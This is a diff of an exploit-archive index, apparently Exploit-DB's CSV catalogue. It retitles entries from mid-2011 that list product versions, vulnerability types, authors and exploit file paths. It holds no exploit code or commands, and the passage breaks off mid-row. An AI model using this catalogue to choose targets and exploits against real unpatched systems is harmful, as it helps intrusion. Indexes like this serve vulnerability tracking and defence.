-17437,platforms/jsp/webapps/17437.txt,"ManageEngine Service Desk Plus 8.0 Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 +17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 .fat Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 -17442,platforms/jsp/webapps/17442.txt,"ManageEngine Support Center Plus 7.8 build <= 7801 Directory Traversal Vulnerability",2011-06-23,xistence,jsp,webapps,0 +17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal vulnerability",2011-06-23,xistence,jsp,webapps,0 17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection Vulnerabilities",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions (cmspages.php) SQL Injection Vulnerability",2011-06-23,"Newbie Campuz",php,webapps,0 -17446,platforms/php/webapps/17446.txt,"Nodesforum 1.059 Remote File Inclusion Vulnerability",2011-06-23,bd0rk,php,webapps,0 +17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion Vulnerability",2011-06-23,bd0rk,php,webapps,0 17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)",2011-06-23,metasploit,windows,remote,0 17449,platforms/windows/local/17449.py,"FreeAmp .pls Buffer Overflow Exploit",2011-06-24,"C4SS!0 G0M3S",windows,local,0 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,metasploit,windows,remote,0 @@ -15151,7 +15149,7 @@ id,file,description,date,author,platform,type,port 17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow",2011-06-27,metasploit,windows,remote,0 17457,platforms/php/webapps/17457.txt,"rgboard 4.2.1 SQL Injection Vulnerability",2011-06-28,hamt0ry,php,webapps,0 -17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 +17458,platforms/windows/dos/17458.txt,"HP Data Protector 6.20 - Multiple Vulnerabilities",2011-06-29,"Core Security",windows,dos,0 17459,platforms/windows/local/17459.txt,"Valve Steam Client Application 1559/1559 - Local Privilege Escalation",2011-06-29,LiquidWorm,windows,local,0 17460,platforms/windows/remote/17460.pl,"Kaillera Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0 17461,platforms/windows/dos/17461.txt,"HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability",2011-06-30,"Core Security",windows,dos,0 @@ -15253,7 +15251,7 @@ id,file,description,date,author,platform,type,port 17575,platforms/windows/remote/17575.txt,"Safari 5.0.5 SVG Remote Code Execution Exploit (DEP bypass)",2011-07-26,Abysssec,windows,remote,0 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool Cross-Site Request Forgery PoC",2011-07-27,"Narendra Shinde",cgi,webapps,0 17578,platforms/windows/remote/17578.txt,"MinaliC Webserver 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0 -17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 Blind time-based SQL Injection (MSF)",2011-07-28,TecR0c,php,webapps,0 +17579,platforms/php/webapps/17579.rb,"Joomla 1.5 com_virtuemart <= 1.1.7 - Blind time-based SQL Injection (MSF)",2011-07-28,TecR0c,php,webapps,0 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial Of Service",2011-07-28,X-h4ck,windows,dos,0 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop Stack-Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0 @@ -15265,7 +15263,7 @@ id,file,description,date,author,platform,type,port 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 (register_form()) Multiple POST XSS Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0 17591,platforms/php/webapps/17591.txt,"Joomla Component (com_obSuggest) Local File Inclusion Vulnerability",2011-07-31,v3n0m,php,webapps,0 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 CSRF Vulnerability",2011-08-01,Xadpritox,php,webapps,0 -17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 Remote File Inclusion Vulnerability",2011-08-01,iye,php,webapps,0 +17593,platforms/php/webapps/17593.txt,"Zoneminder 1.24.3 - Remote File Inclusion Vulnerability",2011-08-01,iye,php,webapps,0 17594,platforms/jsp/webapps/17594.rb,"CA Arcserve D2D GWT RPC Credential Information Disclosure",2011-08-01,metasploit,jsp,webapps,0 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs (plugin) 0day SQL injection vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 17597,platforms/php/webapps/17597.txt,"SiteGenius Blind SQL injection Vulnerability",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0 @@ -15280,20 +15278,20 @@ id,file,description,date,author,platform,type,port 17610,platforms/multiple/dos/17610.py,"OpenSLP Denial of Service Exploit",2011-08-05,"Nicolas Gregoire",multiple,dos,0 17611,platforms/linux/local/17611.pl,"Unrar 3.9.3 Local Stack Overflow Exploit",2011-08-05,ZadYree,linux,local,0 17612,platforms/windows/remote/17612.rb,"Firefox 3.6.16 OBJECT mChannel Remote Code Execution Exploit (DEP bypass)",2011-08-05,Rh0,windows,remote,0 -17613,platforms/php/webapps/17613.php,"WP E-commerce plugin <= 3.8.4 SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 +17613,platforms/php/webapps/17613.php,"Wordpress Plugin E-commerce <= 3.8.4 - SQL Injection Exploit",2011-08-05,IHTeam,php,webapps,0 17614,platforms/hp-ux/remote/17614.sh,"HP Data Protector Remote Shell for HP-UX",2011-08-05,"Adrian Puente Z.",hp-ux,remote,0 17615,platforms/jsp/webapps/17615.rb,"Sun/Oracle GlassFish Server Authenticated Code Execution",2011-08-05,metasploit,jsp,webapps,0 17616,platforms/php/webapps/17616.txt,"WordPress ProPlayer plugin <= 4.7.7 SQL Injection Vulnerability",2011-08-05,"Miroslav Stampar",php,webapps,0 17617,platforms/php/webapps/17617.txt,"WordPress Social Slider plugin <= 5.6.5 SQL Injection Vulnerability",2011-08-05,"Miroslav Stampar",php,webapps,0 17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 TFTP Server DoS (write command)",2011-08-05,"SecPod Research",windows,dos,0 17619,platforms/windows/remote/17619.py,"CiscoKits 1.0 TFTP Server Directory Traversal Vulnerability",2011-08-05,"SecPod Research",windows,remote,0 -17620,platforms/windows/dos/17620.txt,"ThreeDify Designer 5.0.2 Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 +17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17626,platforms/windows/remote/17626.rb,"PXE exploit server",2011-08-05,metasploit,windows,remote,0 17627,platforms/php/webapps/17627.txt,"WordPress UPM Polls plugin <= 1.0.3 SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 17628,platforms/php/webapps/17628.txt,"WordPress Media Library Categories plugin <= 1.0.6 SQL Injection Vulnerability",2011-08-06,"Miroslav Stampar",php,webapps,0 -17629,platforms/php/webapps/17629.txt,"AContent 1.1 Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 +17629,platforms/php/webapps/17629.txt,"acontent 1.1 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17630,platforms/php/webapps/17630.txt,"AChecker 1.2 Multiple Error-Based SQL Injection vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 -17631,platforms/php/webapps/17631.txt,"ATutor 2.0.2 Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 +17631,platforms/php/webapps/17631.txt,"atutor 2.0.2 - Multiple Vulnerabilities",2011-08-06,LiquidWorm,php,webapps,0 17633,platforms/php/webapps/17633.txt,"Cart Software Multiple Vulnerabilities",2011-08-06,hosinn,php,webapps,0 17634,platforms/windows/local/17634.pl,"Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit",2011-08-07,"C4SS!0 G0M3S",windows,local,0 17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL Interface Universal Path Traversal",2011-08-07,"Myo Soe",hardware,remote,0 @@ -15305,8 +15303,8 @@ id,file,description,date,author,platform,type,port 17641,platforms/php/webapps/17641.txt,"Lasernet CMS 1.5 - SQL Injection Vulnerability",2011-08-09,p0pc0rn,php,webapps,0 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0 17643,platforms/windows/dos/17643.pl,"Excel SLYK Format Parsing Buffer Overrun Vulnerability PoC",2011-08-09,webDEViL,windows,dos,0 -17644,platforms/php/webapps/17644.txt,"FCKeditor all version Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0 -17645,platforms/hardware/remote/17645.py,"iPhone/iPad Phone Drive 1.1.1 Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0 +17644,platforms/php/webapps/17644.txt,"FCKeditor all version - Arbitrary File Upload Vulnerability",2011-08-09,pentesters.ir,php,webapps,0 +17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,IRCRASH,hardware,remote,0 17646,platforms/php/webapps/17646.txt,"TNR Enhanced Joomla Search <= SQL Injection Vulnerability",2011-08-09,NoGe,php,webapps,0 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass Exploit",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17648,platforms/linux/remote/17648.sh,"HP Data Protector Remote Root Shell for Linux",2011-08-10,SZ,linux,remote,0 @@ -15323,7 +15321,7 @@ id,file,description,date,author,platform,type,port 17664,platforms/windows/dos/17664.py,"NSHC Papyrus Heap Overflow Vulnerability",2011-08-13,wh1ant,windows,dos,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 DEP Bypass Exploit",2011-08-13,"C4SS!0 G0M3S",windows,local,0 17666,platforms/php/webapps/17666.txt,"Prediction Football 2.51 XRF / CSRF",2011-08-14,"Smith Falcon",php,webapps,0 -17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 +17667,platforms/php/webapps/17667.php,"Contrexx Shopsystem <= 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability",2011-08-15,nion,windows,remote,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)",2011-08-16,mr_me,windows,remote,0 @@ -15333,12 +15331,12 @@ id,file,description,date,author,platform,type,port 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin LIST command Remote Heap Overflow PoC",2011-08-17,0in,windows,dos,0 17677,platforms/php/webapps/17677.txt,"WordPress File Groups plugin <= 1.1.2 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 17678,platforms/php/webapps/17678.txt,"WordPress Contus HD FLV Player plugin <= 1.3 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 -17679,platforms/php/webapps/17679.txt,"WordPress WP Symposium plugin <= 0.64 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 +17679,platforms/php/webapps/17679.txt,"Wordpress Plugin Symposium <= 0.64 - SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 17680,platforms/php/webapps/17680.txt,"WordPress Easy Contact Form Lite plugin <= 1.0.7 SQLi",2011-08-17,"Miroslav Stampar",php,webapps,0 17681,platforms/php/webapps/17681.txt,"WordPress OdiHost Newsletter plugin <= 1.0 SQL Injection Vulnerability",2011-08-17,"Miroslav Stampar",php,webapps,0 17682,platforms/php/webapps/17682.php,"Contrexx Shopsystem <= 2.2 SP3 (catId) - Blind SQL Injection",2011-08-17,Penguin,php,webapps,0 -17683,platforms/php/webapps/17683.txt,"WordPress WP DS FAQ plugin <= 1.3.2 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 -17684,platforms/php/webapps/17684.txt,"WordPress WP Forum plugin <= 1.7.8 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 +17683,platforms/php/webapps/17683.txt,"Wordpress Plugin DS FAQ <= 1.3.2 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 +17684,platforms/php/webapps/17684.txt,"Wordpress Plugin Forum <= 1.7.8 - SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17685,platforms/php/webapps/17685.txt,"Elgg <= 1.7.10 - Multiple Vulnerabilities",2011-08-18,"Aung Khant",php,webapps,0 17686,platforms/php/webapps/17686.txt,"WordPress Ajax Gallery plugin <= 3.0 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17687,platforms/php/webapps/17687.txt,"WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 @@ -15346,7 +15344,7 @@ id,file,description,date,author,platform,type,port 17689,platforms/php/webapps/17689.txt,"WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability",2011-08-18,"Miroslav Stampar",php,webapps,0 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 Remote Command Execution",2011-08-19,metasploit,multiple,remote,0 17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow Exploit (MSF)",2011-08-19,Qnix,windows,remote,0 -17694,platforms/php/webapps/17694.txt,"Network Tracker .95 Stored XSS",2011-08-19,G13,php,webapps,0 +17694,platforms/php/webapps/17694.txt,"network tracker .95 - Stored XSS",2011-08-19,G13,php,webapps,0 17695,platforms/php/webapps/17695.txt,"phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability",2011-08-19,H4T$A,php,webapps,0 17696,platforms/multiple/dos/17696.pl,"Apache httpd Remote Denial of Service (memory exhaustion)",2011-08-19,Kingcope,multiple,dos,0 17697,platforms/windows/remote/17697.rb,"HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution",2011-08-20,metasploit,windows,remote,0 @@ -15357,7 +15355,7 @@ id,file,description,date,author,platform,type,port 17703,platforms/php/webapps/17703.txt,"Axis Commerce (E-Commerce System) Stored XSS",2011-08-20,"Eyup CELIK",php,webapps,0 17704,platforms/php/webapps/17704.txt,"WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability",2011-08-20,"Miroslav Stampar",php,webapps,0 17705,platforms/php/webapps/17705.txt,"EasySiteEdit Remote File Inclusion Vulnerability",2011-08-21,"koskesh jakesh",php,webapps,0 -17706,platforms/php/webapps/17706.pl,"OneFileCMS 1.1.1 - Multiple Remote Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 +17706,platforms/php/webapps/17706.pl,"onefilecms 1.1.1 - Multiple Vulnerabilities",2011-08-21,mr.pr0n,php,webapps,0 17707,platforms/php/webapps/17707.txt,"WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability",2011-08-22,"Miroslav Stampar",php,webapps,0 17708,platforms/php/webapps/17708.txt,"Web Solutions Wcs2u SQL Injection Vulnerability",2011-08-22,tempe_mendoan,php,webapps,0 17709,platforms/php/webapps/17709.txt,"Bonza Digital Cart Script SQL Injection Vulnerability",2011-08-22,"Eyup CELIK",php,webapps,0 @@ -15367,7 +15365,7 @@ id,file,description,date,author,platform,type,port 17713,platforms/jsp/webapps/17713.txt,"ManageEngine ServiceDesk Plus 8.0 Multiple Stored XSS Vulnerabilities",2011-08-23,LiquidWorm,jsp,webapps,0 17714,platforms/php/webapps/17714.txt,"Help Desk Software 1.1g - CSRF (add admin) Vulnerability",2011-08-24,G13,php,webapps,0 17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 -17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0 +17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0 17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0 17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0 @@ -15379,12 +15377,12 @@ id,file,description,date,author,platform,type,port 17728,platforms/php/webapps/17728.txt,"WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 17729,platforms/php/webapps/17729.txt,"WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 17730,platforms/php/webapps/17730.txt,"WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerability",2011-08-27,"Miroslav Stampar",php,webapps,0 -17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin <= 1.0 Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 +17731,platforms/php/webapps/17731.txt,"WordPress Photoracer Plugin <= 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 DEP Bypass Exploit",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro <= 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0 17734,platforms/php/webapps/17734.txt,"JCE Joomla Extension <= 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0 17735,platforms/windows/local/17735.pl,"yahoo! player 1.5 (.m3u) Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 -17736,platforms/php/webapps/17736.txt,"Joomla Simple File Lister module <= 1.0 Directory Traversal Vulnerability",2011-08-28,evilsocket,php,webapps,0 +17736,platforms/php/webapps/17736.txt,"joomla simple file lister module <= 1.0 - Directory Traversal vulnerability",2011-08-28,evilsocket,php,webapps,0 17737,platforms/php/webapps/17737.txt,"WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17738,platforms/php/webapps/17738.txt,"WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 17739,platforms/php/webapps/17739.txt,"WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability",2011-08-28,"Miroslav Stampar",php,webapps,0 @@ -15399,18 +15397,18 @@ id,file,description,date,author,platform,type,port 17750,platforms/php/webapps/17750.txt,"WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability",2011-08-30,"Miroslav Stampar",php,webapps,0 17751,platforms/php/webapps/17751.txt,"WordPress Event Registration plugin <= 5.4.3 SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17752,platforms/php/webapps/17752.txt,"vAuthenticate 3.0.1 Authentication Bypass",2011-08-30,bd0rk,php,webapps,0 -17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script v 1.5 SQL Injection Vulnerability",2011-08-30,SubhashDasyam,php,webapps,0 -17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard version Universal Exploit, DEP+ASLR Bypass.",2011-08-30,sickness,windows,local,0 +17753,platforms/php/webapps/17753.txt,"FileBox - File Hosting & Sharing Script 1.5 - SQL Injection Vulnerability",2011-08-30,SubhashDasyam,php,webapps,0 +17754,platforms/windows/local/17754.c,"DVD X Player 5.5.0 Pro / Standard - Universal Exploit, DEP+ASLR Bypass.",2011-08-30,sickness,windows,local,0 17755,platforms/php/webapps/17755.txt,"WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability",2011-08-30,"Miroslav Stampar",php,webapps,0 -17756,platforms/php/webapps/17756.txt,"WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 +17756,platforms/php/webapps/17756.txt,"Wordpress Plugin audio gallery playlist <= 0.12 - SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17757,platforms/php/webapps/17757.txt,"WordPress yolink Search plugin <= 1.1.4 SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17758,platforms/php/webapps/17758.txt,"WordPress PureHTML plugin <= 1.0.0 SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17759,platforms/php/webapps/17759.txt,"WordPress Couponer plugin <= 1.2 SQL Injection",2011-08-30,"Miroslav Stampar",php,webapps,0 17760,platforms/php/webapps/17760.txt,"Wordpress grapefile plugin <= 1.1 Arbitrary File Upload",2011-08-31,"Hrvoje Spoljar",php,webapps,0 -17761,platforms/php/webapps/17761.txt,"Wordpress Image Gallery with Slideshow plugin <= 1.5 Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 +17761,platforms/php/webapps/17761.txt,"wordpress image gallery with slideshow plugin <= 1.5 - Multiple Vulnerabilities",2011-08-31,"Hrvoje Spoljar",php,webapps,0 17762,platforms/windows/remote/17762.rb,"Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability",2011-08-31,metasploit,windows,remote,0 17763,platforms/php/webapps/17763.txt,"WordPress Donation plugin <= 1.0 SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 -17764,platforms/php/webapps/17764.txt,"WordPress WP Bannerize plugin <= 2.8.6 SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 +17764,platforms/php/webapps/17764.txt,"Wordpress Plugin Bannerize <= 2.8.6 - SQL Injection",2011-09-01,"Miroslav Stampar",php,webapps,0 17766,platforms/windows/webapps/17766.txt,"NetSaro Enterprise Messenger 2.0 - Multiple Vulnerabilities",2011-09-01,"Narendra Shinde",windows,webapps,0 17767,platforms/php/webapps/17767.txt,"WordPress SearchAutocomplete plugin <= 1.0.8 SQL Injection Vulnerability",2011-09-01,"Miroslav Stampar",php,webapps,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 @@ -15418,7 +15416,7 @@ id,file,description,date,author,platform,type,port 17771,platforms/php/webapps/17771.txt,"WordPress VideoWhisper Video Presentation plugin <= 1.1 SQL Injection Vulnerability",2011-09-02,"Miroslav Stampar",php,webapps,0 17772,platforms/windows/dos/17772.txt,"BroadWin WebAccess Client Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17773,platforms/php/webapps/17773.txt,"WordPress Facebook Opengraph Meta Plugin plugin <= 1.0 SQL Injection Vulnerability",2011-09-03,"Miroslav Stampar",php,webapps,0 -17774,platforms/php/webapps/17774.txt,"Openads-2.0.11 Remote File inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 +17774,platforms/php/webapps/17774.txt,"openads-2.0.11 - Remote File Inclusion Vulnerability",2011-09-03,"HaCkErS eV!L",php,webapps,0 17777,platforms/windows/local/17777.rb,"Apple QuickTime PICT PnSize Buffer Overflow",2011-09-03,metasploit,windows,local,0 17778,platforms/php/webapps/17778.txt,"WordPress Zotpress plugin <= 4.4 SQL Injection Vulnerability",2011-09-04,"Miroslav Stampar",php,webapps,0 17779,platforms/php/webapps/17779.txt,"WordPress oQey Gallery plugin <= 0.4.8 SQL Injection Vulnerability",2011-09-05,"Miroslav Stampar",php,webapps,0 @@ -15463,11 +15461,11 @@ id,file,description,date,author,platform,type,port 17824,platforms/php/webapps/17824.txt,"Slaed CMS Code Exec Vulnerability",2011-09-12,brain[pillow],php,webapps,0 17825,platforms/php/webapps/17825.txt,"AstroCMS Multiple Vulnerabilities",2011-09-12,brain[pillow],php,webapps,0 17827,platforms/windows/remote/17827.rb,"Procyon Core Server HMI <= 1.13 - Coreservice.exe Stack Buffer Overflow",2011-09-12,metasploit,windows,remote,0 -17828,platforms/php/webapps/17828.txt,"WordPress WP Forum Server plugin <= 1.7 SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 +17828,platforms/php/webapps/17828.txt,"Wordpress Plugin Forum Server <= 1.7 - SQL Injection Vulnerability",2011-09-13,"Miroslav Stampar",php,webapps,0 17829,platforms/php/webapps/17829.txt,"dotProject 2.1.5 SQL Injection Vulnerability",2011-09-13,sherl0ck_,php,webapps,0 17830,platforms/windows/dos/17830.txt,"Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption",2011-09-13,"Luigi Auriemma",windows,dos,0 17831,platforms/windows/dos/17831.txt,"MS WINS ECommEndDlg Input Validation Error",2011-09-13,"Core Security",windows,dos,0 -17832,platforms/php/webapps/17832.txt,"WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 +17832,platforms/php/webapps/17832.txt,"Wordpress Plugin e-Commerce <= 3.8.6 - SQL Injection Vulnerability",2011-09-14,"Miroslav Stampar",php,webapps,0 17833,platforms/windows/local/17833.rb,"ScadaTEC ScadaPhone <= 5.3.11.1230 - Stack Buffer Overflow",2011-09-13,metasploit,windows,local,0 17835,platforms/windows/dos/17835.txt,"Beckhoff TwinCAT <= 2.11.0.2004 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 17836,platforms/windows/dos/17836.txt,"Equis MetaStock <= 11 Use After Free",2011-09-14,"Luigi Auriemma",windows,dos,0 @@ -15476,9 +15474,9 @@ id,file,description,date,author,platform,type,port 17839,platforms/windows/dos/17839.txt,"Cogent DataHub <= 7.1.1.63 Integer Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 17840,platforms/windows/webapps/17840.txt,"Cogent DataHub <= 7.1.1.63 Source Disclosure",2011-09-14,"Luigi Auriemma",windows,webapps,0 17841,platforms/windows/dos/17841.txt,"DAQFactory <= 5.85 build 1853 Stack Overflow",2011-09-14,"Luigi Auriemma",windows,dos,0 -17842,platforms/windows/dos/17842.txt,"Progea Movicon / PowerHMI <= 11.2.1085 Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 +17842,platforms/windows/dos/17842.txt,"progea movicon / powerhmi <= 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix <= 19 Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0 -17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro <= 4.0.0 Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 +17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro <= 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0 17846,platforms/jsp/webapps/17846.php,"Nortel Contact Recording Centralized Archive 6.5.1 SQL Injection Exploit",2011-09-15,rgod,jsp,webapps,0 17847,platforms/windows/local/17847.py,"Mini-Stream Ripper 2.9.7 DEP Bypass",2011-09-16,Blake,windows,local,0 17848,platforms/windows/remote/17848.rb,"Measuresoft ScadaPro <= 4.0.0 Remote Command Execution",2011-09-16,metasploit,windows,remote,0 @@ -15510,12 +15508,12 @@ id,file,description,date,author,platform,type,port 17876,platforms/windows/remote/17876.py,"ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)",2011-09-20,modpr0be,windows,remote,0 17877,platforms/windows/local/17877.py,"AVCon DEP Bypass",2011-09-20,Blake,windows,local,0 17878,platforms/windows/dos/17878.txt,"EViews <= 7.0.0.1 (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 -17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 +17879,platforms/windows/dos/17879.txt,"MetaServer RT <= 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0 17880,platforms/windows/local/17880.rb,"eSignal and eSignal Pro <= 10.6.2425.1208 